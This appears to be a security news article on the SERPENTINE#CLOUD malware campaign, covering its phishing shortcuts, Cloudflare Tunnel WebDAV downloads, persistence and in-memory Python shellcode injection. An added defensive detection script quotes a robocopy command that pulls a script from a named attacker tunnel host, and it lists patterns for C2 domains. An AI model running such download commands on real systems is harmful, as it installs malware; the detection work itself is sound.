Tuesday, March 17, 2026

Python Malware Targets Windows Systems Through Cloudflare Tunnels Exploited by Hackers

A new wave of cyberattacks, dubbed SERPENTINE#CLOUD, is leveraging Python, Cloudflare tunneling services, and deceptive file tactics to stealthily compromise Windows computers worldwide.

This evolving campaign, uncovered by Securonix researchers, exhibits a multi-layered infection chain that blends social engineering with advanced technical evasion, marking a concerning shift in how malware can bypass traditional security controls.

Initial Infection: Disguised Shortcuts and Phishing Lures

The attack begins with a well-orchestrated phishing campaign, where victims receive emails offering invoice or payment-related documents.

Attached or linked within are ZIP files containing malicious shortcut (.lnk) files made to look like harmless PDFs.

What sets this campaign apart is the use of customized icons and file names that conceal their true nature, even if users have file extensions visible in Windows Explorer.

Once executed, these .lnk files trigger a sophisticated sequence of events. Using built-in Windows utilities such as cmd.exe and robocopy, the malware silently downloads additional payloads via WebDAV over HTTPS from attacker-controlled Cloudflare Tunnel subdomains, such as flour-riding-merit-refers.trycloudflare.com.

Cloudflare Tunnels are intended for legitimate remote access and testing, but in this campaign, they provide a secure, encrypted channel for malware distribution, making network monitoring and attribution far more difficult.

Technical Sophistication: Obfuscated Payloads and Modular Execution

The next stage involves executing downloaded scripts, typically Windows Script Files (WSF) or batch files, that further obfuscate and modularize the attack chain. For example, after the initial .lnk file executes, it retrieves a script like tank.wsf, which in turn downloads and runs a highly obfuscated batch file (kiki.bat).

These scripts employ advanced obfuscation techniques, including encoding and dynamic command construction, to evade detection by antivirus and endpoint protection platforms.

The batch scripts serve as primary delivery mechanisms, downloading compressed Python packages and additional malicious scripts.

These downloads and extractions take place in the user’s Contacts directory, an unconventional path that often goes unnoticed by security tools.

The scripts then establish persistence by dropping VBS and batch files into the Windows startup folder, ensuring continued execution upon system reboot.

Memory-Resident Malware and Remote Control

At the heart of this campaign are Python-based shellcode loaders, designed to decrypt and execute payloads entirely in memory. The main loader, run.py, uses XOR encryption and leverages native Windows APIs to inject shellcode into a legitimate process such as notepad.exe.

This Early Bird APC injection technique enables malicious code to execute before the process performs its intended functions, effectively hiding the malware from many endpoint detection and response (EDR) solutions.

The final payload, often packed with the open-source Donut loader, is decrypted and executed in memory, leaving minimal forensic evidence on disk.

Once activated, the malware beacons out to command and control (C2) servers hosted on both Cloudflare tunnel subdomains and custom domains, giving attackers full remote control over infected machines.

Commonly observed C2 infrastructure includes domains like nhvncpure.shop and dynamic DNS services such as duckdns.org.
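The stages described above (LOLBin download over WebDAV from a trycloudflare.com host, script execution from the Contacts directory, Startup-folder persistence, the Python loader targeting notepad.exe, and lookups of the named C2 domains) map onto a handful of telemetry rules. The following is an added example, not code from the article or from Securonix; the event records are constructed, Sysmon-style dicts, and the "python.exe spawning notepad.exe" rule is an assumption about how the injection target would appear in process-creation logs:

```python
import re
from typing import Dict, List, Tuple

# Constructed, Sysmon-style telemetry (simplified dicts); not taken from the article.
EVENTS: List[Dict[str, str]] = [
    {"type": "process", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": r"cmd.exe /c robocopy \\flour-riding-merit-refers.trycloudflare.com@SSL"
                r"\DavWWWRoot\ C:\Users\alice\Contacts tank.wsf"},
    {"type": "process", "parent": "cmd.exe", "image": "wscript.exe",
     "cmdline": r"wscript.exe C:\Users\alice\Contacts\tank.wsf"},
    {"type": "file", "image": "cmd.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\up.vbs"},
    {"type": "process", "parent": "python.exe", "image": "notepad.exe", "cmdline": "notepad.exe"},
    {"type": "dns", "image": "notepad.exe", "query": "somehost.duckdns.org"},
    {"type": "process", "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\Documents\notes.txt"},  # benign control
]

TUNNEL_RE = re.compile(r"[a-z0-9-]+\.trycloudflare\.com", re.I)
CONTACTS_RE = re.compile(r"\\Users\\[^\\]+\\Contacts\\", re.I)
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(vbs|bat|cmd)$", re.I)
C2_SUFFIXES = (".trycloudflare.com", ".duckdns.org", "nhvncpure.shop")  # domains named in the report
LOLBINS = {"cmd.exe", "robocopy.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}

def classify(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event trips (possibly none)."""
    hits = []
    img = ev["image"].lower()
    if ev["type"] == "process":
        cmd = ev.get("cmdline", "")
        # Built-in tools pulling files over WebDAV from a Cloudflare Tunnel hostname
        if img in LOLBINS and TUNNEL_RE.search(cmd):
            hits.append("tunnel_webdav_fetch")
        # Script hosts running content staged in the user's Contacts directory
        if img in SCRIPT_HOSTS and CONTACTS_RE.search(cmd):
            hits.append("script_from_contacts")
        # Python interpreter creating notepad.exe, the injection target named in the report (assumption)
        if ev["parent"].lower() in {"python.exe", "pythonw.exe"} and img == "notepad.exe":
            hits.append("python_spawns_notepad")
    elif ev["type"] == "file" and STARTUP_RE.search(ev["target"]):
        hits.append("startup_script_drop")  # persistence via the Startup folder
    elif ev["type"] == "dns" and ev["query"].lower().endswith(C2_SUFFIXES):
        hits.append("c2_domain_lookup")
    return hits

def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Run every rule over the event stream; returns (event index, rule name) pairs."""
    return [(i, h) for i, ev in enumerate(events) for h in classify(ev)]
```

Running `scan(EVENTS)` flags the first five constructed events, one rule each, and leaves the benign notepad.exe launch untouched; the trycloudflare.com rule is intentionally broad, since the subdomains are generated per tunnel and any such lookup from a workstation deserves review.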

Conclusion and Recommendations

The SERPENTINE#CLOUD campaign highlights the growing sophistication of cybercriminal tactics, blending social engineering, legitimate web services, and in-memory execution to evade detection.

Organizations are advised to implement strict email filtering, monitor unusual script execution in non-standard directories, and establish robust endpoint logging to detect and respond to advanced threats.

As attackers continue to innovate, vigilance and adaptive security measures remain the best defense against these evolving risks.

Indicators of Compromise

